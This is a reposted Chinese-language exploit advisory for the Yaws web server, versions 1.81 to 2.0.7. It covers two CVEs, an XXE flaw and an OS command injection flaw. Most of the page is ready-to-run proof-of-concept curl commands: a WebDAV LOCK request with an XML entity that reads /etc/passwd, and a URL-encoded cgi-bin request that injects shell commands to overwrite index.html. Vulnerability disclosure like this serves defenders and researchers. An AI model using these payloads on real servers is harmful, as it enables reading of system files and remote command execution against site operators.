Yaws 2.0.7 XML注入/命令注入漏洞—Hack之路

#攻击标题:Yaws web服务器中存在多个漏洞
#攻击作者:亚历克赛·普罗宁(vulnbe)
#供应商主页:http://yaws.hyber.org/
#软件链接:https://github.com/erlyaws/yaws
#受影响的版本:1.81-2.0.7
#CVE:CVE-2020-24379、CVE-2020-24916

1说明:

———————-

Yaws版本1.81到2.0.7易受XXE和OS命令注入的攻击。

2XXE注射概念证明(CVE-2020-24379)
curl -i -s -k -X LOCK http://localhost:8000/ -H ‘Timeout: Second-1’ \
–data-binary @- << EOF
<?xml version=”1.0″ encoding=”utf-8″ ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM “file:///etc/passwd”>
]>
<d:lockinfo xmlns:d=”DAV:”>
<d:lockscope><d:exclusive/></d:lockscope>
<d:locktype><d:write/></d:locktype>
<d:owner>
<d:href><r>&sp;</r></d:href>
</d:owner>
</d:lockinfo>
EOF

三。操作系统命令注入概念验证(CVE-2020-24916)

———————-

curl ‘http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22’

四:关于漏洞详情

*漏洞详细信息:https://vuln.be/post/yaws-xxe-and-shell-injections/
*XXE注射PoC:https://github.com/vulnbe/poc-yaws-dav-xxe)
*壳体注射PoC:https://github.com/vulnbe/poc-yaws-cgi-shell-injection

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/09/yaws-2-0-7-xml%e6%b3%a8%e5%85%a5-%e5%91%bd%e4%bb%a4%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注